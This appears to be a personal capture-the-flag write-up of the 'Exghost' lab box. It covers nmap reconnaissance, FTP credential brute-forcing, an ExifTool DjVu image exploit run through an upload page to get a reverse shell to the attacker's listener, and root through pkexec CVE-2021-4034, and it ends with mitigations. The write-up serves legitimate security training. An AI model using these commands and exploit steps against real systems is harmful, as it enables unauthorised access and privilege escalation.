Exghost | PG Practice

---

Reconnaissance

Running an nmap scan the following ports where found

# Nmap 7.94SVN scan initiated Wed May 29 09:02:43 2024 as: nmap -p- -T4 -v --min-rate=1000 -sCV -oN nmap.txt 192.168.235.183
Nmap scan report for 192.168.235.183
Host is up (0.15s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT   STATE  SERVICE  VERSION
20/tcp closed ftp-data
21/tcp open   ftp      vsftpd 3.0.3
80/tcp open   http     Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: 403 Forbidden
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
Service Info: Host: 127.0.0.1; OS: Unix

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed May 29 09:05:07 2024 -- 1 IP address (1 host up) scanned in 144.47 seconds

Enumerating FTP I don’t have access to login anonymously

Navigating to the website endpoint we have this 403 forbidden page

I was able to fuzz for an /uploads directory but turns out to still be 403 Forbidden, all 403 bypass proof failed and i knew this was a dead end.

However i felt like bruteforcing FTP might be a quick win for me sooo i decided to use the tool from GitHub which gave me a valid username and password

git clone https://github.com/rix4uni/FTPBruteForce.git
cd FTPBruteForce
go get -u github.com/jlaffaye/ftp
go run ftp-brute-force-default-credentails.go -ip 192.168.235.183:21

Upon login in i found a backup file and downloaded it to my own machine

Analyzing the backup file with wireshark and looking for captured HTTP packets i found an exiftool version

Also found out i was able to upload files within an endpoint called /exiftest.php

Which turns out to be true while using the curl utility, The below command uploads a local file or send data that is typically submitted via web forms with the -F option and -v for verbosity.

Also take note of the parameter “myFile” as this was the variable given in the above screenshot

curl -F "myFile=@./LOCALFILE" http://192.168.235.183/exiftest.php -v

Foothold

Using this blog i was able to create a malicious .jpeg file due to Improper neutralization of user data in the DjVu file format in ExifTool versions 7.44 and up that allows arbitrary code execution when parsing the malicious image.

python3 exploit.py -s 192.168.45.219 4444

Then uploaded it using curl and got a reverse shell with netcat

curl -F "myFile=@./image.jpg" http://192.168.180.183/exiftest.php -v

nc -lvnp 4444

Privilege Escalation

Running linpeas.sh on the machine i discovered few SUID binaries exploits, This was real pain as i had to go over each of them and see which was the quick win 🤦‍♀️

Well, privilege escalation was done via the pkexec exploit popularly know as CVE-2021-4034

Polkit (formerly PolicyKit) is a component for controlling system-wide privileges in Unix-like operating systems. It provides an organized way for non-privileged processes to communicate with privileged processes. It is also possible to use polkit to execute commands with elevated privileges using the command pkexec followed by the command intended to be executed (with root permission).

You can get the python exploit from here since most of the C exploits don’t work

Mitigations

• Change default credentials of the FTP server to strong, unique passwords and username.
• Replace FTP with a more secure protocol such as SFTP (Secure File Transfer Protocol) or FTPS (FTP Secure).
• Ensure ExifTool is updated to the latest version that includes the security patch, better still remove or restrict ExifTool Usage
• Update the Polkit package or Disable pkexec : sudo chmod 0755 /usr/bin/pkexec

Have fun xD

Status Check ⚠️

I shouldn’t be playing boxes 🤣, i have got exams next week but hell yeah, i really don’t wanna be far away from doing this. However i might limit all of this in the coming months, Take of yourselves Fellas :)